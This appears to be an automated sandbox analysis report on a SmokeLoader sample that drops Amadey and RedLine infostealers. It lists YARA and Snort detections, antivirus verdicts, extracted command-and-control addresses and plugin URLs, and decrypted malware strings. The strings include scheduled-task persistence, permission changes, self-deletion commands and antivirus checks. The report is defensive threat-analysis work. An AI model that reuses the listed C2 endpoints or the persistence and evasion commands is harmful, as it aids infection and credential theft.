22.2.l2956268.exe.af0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
5.3.6F2B.exe.5125820.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x17f8c:$v2_1: ListOfProcesses 0x17d68:$v4_3: base64str 0x18bc5:$v4_4: stringKey 0x161c5:$v4_5: BytesToStringConverted 0x1528b:$v4_6: FromBase64 0x16729:$v4_8: procName
5.3.6F2B.exe.5125820.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.3.6F2B.exe.5125820.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a08:$pat14: , CommandLine: 0x19d8c:$v2_1: ListOfProcesses 0x19b68:$v4_3: base64str 0x1a9c5:$v4_4: stringKey 0x17fc5:$v4_5: BytesToStringConverted 0x1708b:$v4_6: FromBase64 0x18529:$v4_8: procName
7.0.g6604988.exe.11a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.0.g6604988.exe.11a0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
12.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
42.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
9.3.y4910383.exe.4b9dc20.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.3.y4910383.exe.4b9dc20.0.raw.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
28.0.j8994074.exe.7a0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
28.0.j8994074.exe.7a0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a08:$pat14: , CommandLine: 0x19d8c:$v2_1: ListOfProcesses 0x19b68:$v4_3: base64str 0x1a9c5:$v4_4: stringKey 0x17fc5:$v4_5: BytesToStringConverted 0x1708b:$v4_6: FromBase64 0x18529:$v4_8: procName
21.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
8.3.D217.exe.e9da20.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.3.D217.exe.e9da20.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a08:$pat14: , CommandLine: 0x19d8c:$v2_1: ListOfProcesses 0x19b68:$v4_3: base64str 0x1a9c5:$v4_4: stringKey 0x17fc5:$v4_5: BytesToStringConverted 0x1708b:$v4_6: FromBase64 0x18529:$v4_8: procName
13.2.ohcompetitive.exe.79a0000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
29.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0.2.q4B165cujP.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.2.ohcompetitive.exe.4296d10.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
8.3.D217.exe.e9da20.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x17f8c:$v2_1: ListOfProcesses 0x17d68:$v4_3: base64str 0x18bc5:$v4_4: stringKey 0x161c5:$v4_5: BytesToStringConverted 0x1528b:$v4_6: FromBase64 0x16729:$v4_8: procName
37.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
13.2.ohcompetitive.exe.32e5268.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.0.q4B165cujP.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
42.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
29.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
40.2.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.2.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
9.3.y4910383.exe.4b9dc20.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.3.y4910383.exe.4b9dc20.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6240:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
4.2.jfshvii.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
22.0.l2956268.exe.af0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.0.l2956268.exe.af0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
13.2.ohcompetitive.exe.42bed30.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
26.2.rundll32.exe.6e800000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
26.2.rundll32.exe.6e800000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.ohcompetitive.exe.32e5268.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.0.pdates.exe.1030000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.0.pdates.exe.1030000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
7.2.g6604988.exe.11a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.g6604988.exe.11a0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x6e40:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
13.2.ohcompetitive.exe.430ed50.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 52 entries

Snort Signatures

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 77.91.68.29

Timestamp:	192.168.2.577.91.68.2949724802851815 07/27/23-01:33:02.402503
SID:	2851815
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.5 - Destination IP: 77.91.68.29

Timestamp:	192.168.2.577.91.68.2949718802851815 07/27/23-01:32:59.183951
SID:	2851815
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://77.91.68.61/rock/index.php	URL Reputation: Label: malware
Source: http://77.91.68.61/rock/index.php1/rock/index.php	URL Reputation: Label: malware
Source: http://77.91.68.61/rock/Plugins/cred64.dll	URL Reputation: Label: malware
Source: http://77.91.68.61/rock/Plugins/clip64.dllgP	Avira URL Cloud: Label: malware
Source: http://77.91.68.61/rock/Plugins/cred64.dllb05	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\3448.exe	Avira: detection malicious, Label: HEUR/AGEN.1309865
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Avira: detection malicious, Label: HEUR/AGEN.1310591
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Avira: detection malicious, Label: HEUR/AGEN.1309865
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Roaming\jfshvii	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Avira: detection malicious, Label: TR/Disabler.ocayi
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Avira: detection malicious, Label: HEUR/AGEN.1309865
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Avira: detection malicious, Label: HEUR/AGEN.1310591
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	Avira: detection malicious, Label: HEUR/AGEN.1301048
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Avira: detection malicious, Label: HEUR/AGEN.1301048

Found malware configuration

Source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://77.91.68.29/fks/", "http://77.91.68.29/fks/"]}
Source: 28.0.j8994074.exe.7a0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["77.91.124.84:19071"], "Bot Id": "lande", "Authorization Header": "9fa41701c47df37786234f3373f21208"}
Source: 22.2.l2956268.exe.af0000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "77.91.68.61/rock/index.php", "Version": "3.86"}

Multi AV Scanner detection for submitted file

Source: q4B165cujP.exe

Virustotal: Detection: 82%

Perma Link

Antivirus / Scanner detection for submitted sample

Source: q4B165cujP.exe

Avira: detected

Machine Learning detection for sample

Source: q4B165cujP.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 6[j
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor:
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor:
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 77.91.68.61
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: /rock/index.php
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 3.86
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: S-%lu-
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: %-lu
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: -%lu
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 925e7e99c5
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: pdates.exe
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SCHTASKS
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: /TR "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: " /F
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Startup
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: rundll32
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: /Delete /TN "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Programs
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: %USERPROFILE%
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: \App
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: POST
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &vs=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &sd=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &os=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &bi=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &ar=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &pc=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &un=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &dm=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &av=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &lv=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &og=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Main
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: http://
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: https://
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Plugins/
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &unit=
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: shell32.dll
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: kernel32.dll
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ProgramData\
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: AVAST Software
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Avira
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Kaspersky Lab
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ESET
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Panda Security
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Doctor Web
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 360TotalSecurity
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Bitdefender
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Norton
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Sophos
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Comodo
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: WinDefender
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 0123456789
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ------
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ?scr=1
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: .jpg
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ComputerName
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: -unicode-
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: VideoID
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: \0000
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ProductName
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 2019
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 2022
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 2016
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: CurrentBuild
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: echo Y\|CACLS "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: " /P "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: CACLS "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: :R" /E
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: :F" /E
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &&Exit
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: rundll32.exe
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: "taskkill /f /im "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: " && timeout 1 && del
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: && Exit"
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: " && ren
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: &&
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Powershell.exe
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: v+
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: 9f
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: KM
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: ~82
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: >mqA
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: Ymgvc
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor:
Source: 22.2.l2956268.exe.af0000.0.unpack	String decryptor: $u

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7_Fjlbt.cpl	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jfshvii	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00932F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		5_2_00932F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		6_2_00CE2F1D

Source: q4B165cujP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:50304 version: TLS 1.2

Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: wextract.pdb source: explorer.exe, 00000001.00000003.468593749.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.470742805.000000000D8C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.466088013.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, 6F2B.exe, 6F2B.exe, 00000005.00000000.466315554.0000000000931000.00000020.00000001.01000000.00000006.sdmp, 6F2B.exe, 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, x5587928.exe, 00000006.00000000.467399874.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, D217.exe, 00000008.00000002.773219124.0000000001271000.00000020.00000001.01000000.0000000B.sdmp, D217.exe, 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000002.483833372.0000000000821000.00000020.00000001.01000000.0000000D.sdmp, 3448.exe, 0000000A.00000000.471189674.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp, 3448.exe, 0000000A.00000002.908508205.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: x5587928.exe, 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000003.468013227.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, g6604988.exe, 00000007.00000000.468266964.00000000011CD000.00000002.00000001.01000000.00000009.sdmp, g6604988.exe, 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmp, g6604988.exe, 00000007.00000003.469830936.0000000003121000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470768085.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, pdates.exe, 0000000C.00000000.471819849.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 0000000C.00000002.909152306.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 00000015.00000002.480535770.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 00000015.00000000.476466612.000000000105D000.00000002.00000001.01000000.00000010.sdmp, l2956268.exe, 00000016.00000002.482336267.0000000000B1D000.00000002.00000001.01000000.00000015.sdmp, l2956268.exe, 00000016.00000000.476913985.0000000000B1D000.00000002.00000001.01000000.00000015.sdmp, pdates.exe, 0000001D.00000000.481854440.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 0000001D.00000002.483424450.000000000105D000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: explorer.exe, 00000001.00000003.468593749.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.470742805.000000000D8C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.466088013.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, 6F2B.exe, 00000005.00000000.466315554.0000000000931000.00000020.00000001.01000000.00000006.sdmp, 6F2B.exe, 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000000.467399874.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, D217.exe, 00000008.00000002.773219124.0000000001271000.00000020.00000001.01000000.0000000B.sdmp, D217.exe, 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000002.483833372.0000000000821000.00000020.00000001.01000000.0000000D.sdmp, 3448.exe, 0000000A.00000000.471189674.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp, 3448.exe, 0000000A.00000002.908508205.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: explorer.exe, 00000001.00000003.473525117.0000000013331000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.488090531.000000000F393000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.473050709.000000000F4E1000.00000004.00000001.00020000.00000000.sdmp, B29C.exe, 0000001F.00000002.525796386.00000000008F9000.00000002.00000001.01000000.0000001B.sdmp, B29C.exe, 0000001F.00000000.489155993.00000000008F9000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: x5587928.exe, 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000003.468013227.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, k4215493.exe, 0000000B.00000000.471443025.00000000001F2000.00000002.00000001.01000000.0000000F.sdmp
